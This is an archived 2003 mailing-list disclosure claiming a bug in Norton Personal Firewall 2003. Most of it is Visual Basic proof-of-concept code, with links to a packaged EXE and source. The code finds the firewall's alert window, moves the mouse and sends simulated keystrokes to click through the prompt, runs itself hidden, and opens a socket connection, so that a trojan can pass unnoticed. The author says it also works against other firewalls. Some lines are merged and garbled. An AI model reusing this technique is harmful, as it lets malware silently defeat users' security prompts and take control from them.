Bug in Norton FireWall 2003

From: Boy Bear <eyal067(at)walla.co.il>
Date: Sat Aug 09 2003 - 04:12:03 EDT

('binary' encoding is not supported, stored as-is)

The Bug factor so lamb Firewall "ignored" from Trojan.

The Trojan than himself in Firewall and so the actually Trojan worker without disturbance the of Firewall.

I added a model in VB and EXE

NortonEXE - http://iso.bbs.us:777/binaryvision/Norton/NortonEXE.zip NortonSRC- http://iso.bbs.us:777/binaryvision/Norton/NortonSRC.zip

It is the code:

Dim numNoWindows As Integer
Dim CMD1 As Integer

Const MOUSEEVENTF_MOVE = &H1
Const MOUSEEVENTF_LEFTDOWN = &H2
Const MOUSEEVENTF_LEFTUP = &H4
Const MOUSEEVENTF_RIGHTDOWN = &H8
Const MOUSEEVENTF_RIGHTUP = &H10
Const MOUSEEVENTF_MIDDLEDOWN = &H20
Const MOUSEEVENTF_MIDDLEUP = &H40
Const MOUSEEVENTF_WHEEL = &H800
Const MOUSEEVENTF_ABSOLUTE = &H8000

Private Type POINTAPI
X As Long
Y As Long
End Type

Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dX As Long, _
ByVal dY As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)

Private Points() As POINTAPI
Private iCount As Long
Private Const KLF_REORDER = &H8
Private Const lang_English = 67699721
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, _
ByVal X As Long, ByVal Y As Long, ByVal CX As Long, ByVal CY As Long, ByVal wFlags As Long) As Long
Private Const SW_HIDE = 0 ' sent to ShowWindow function Private Const SW_SHOW = 5 ' sent to ShowWindow function Private Const HWND_TOPMOST = -1 'sent to SetWindowPos function Private Const vbClass = "wndclass_desked_gsk" 'Visual Basic Class name Private Declare Function ActivateKeyboardLayout Lib "user32" (ByVal HKL As Long, ByVal flags As Long) As Long

Private Sub Command1_Click()
If Winsock2.State <> sckClosed Then Winsock2.Close Winsock2.Connect
End Sub

Private Sub Command2_Click()
Winsock1.Listen
End Sub

Private Sub Form_Load()
Dim lForm As Long
lForm = Me.hwnd
SetWindowPos lForm, HWND_TOPMOST, 0, 0, 0, 0, 1 X = Command
If X = "" Then
Shell (App.Path & "\" & App.EXEName & ".exe /Connect") Winsock2.Connect
X = ""
ElseIf X = "/Connect" Then
X = ""
Me.Hide
Timer2.Enabled = True
End If
End Sub
Private Sub Timer2_Timer()
Dim hwnd As Long
hwnd = FindWindow(vbNullString, "Norton Personal Firewall") If hwnd = 0 Then
numNoWindows = numNoWindows + 1
If numNoWindows = 150 Then
Timer2.Enabled = False
End
End If
Else
Call ActivateKeyboardLayout(lang_English, KLF_REORDER) X = Screen.Width * 2.7
Y = Screen.Height * 2.7
mouse_event MOUSEEVENTF_ABSOLUTE + MOUSEEVENTF_MOVE + MOUSEEVENTF_LEFTDOWN + MOUSEEVENTF_LEFTUP, Y, X, 0, 0 CMD1 = CMD1 + 1
If CMD1 = 1 Then
Timer2.Interval = 300
ElseIf CMD1 = 2 Then
SendKeys "{tab}"
ElseIf CMD1 = 3 Then
SendKeys " "
ElseIf CMD1 = 4 Then

SendKeys "{UP}"
SendKeys "{UP}"
SendKeys "{UP}"

ElseIf CMD1 = 5 Then
SendKeys "{ENTER}"
Timer2.Enabled = False
End
End If
End If
End Sub
Private Sub Winsock2_Connect()

Winsock2.SendData "Msg-Box"

End Sub
Private Sub wHideShow(HideShow As Boolean)

Dim hwnd As Long
hwnd = FindWindow(vbNullString, "Norton Personal Firewall")
'if not found then..

If hwnd = 0 Then
Exit Sub
End If
'if not hidden - hide, else - show

If HideShow Then
ShowWindow hwnd, SW_SHOW
Else
ShowWindow hwnd, SW_SHOW
End If

End Sub

The Bug can act on the any Firewalls that I recognize (zonealarm, BlackICE....)

The full article situated here (in Hebrew):

http://tankz.zext.net/binaryvision/index.php?title=bug%20in%20Norton% 20Firewall%202003&page=modules/articles/display.php&cat=Security&file=bug% 20in%20Norton%20Firewall%202003&right=modules/articles

BoyBear From BinaryVision ( http://binaryvision.tech.nu ) Received on Mon Aug 11 13:31:37 2003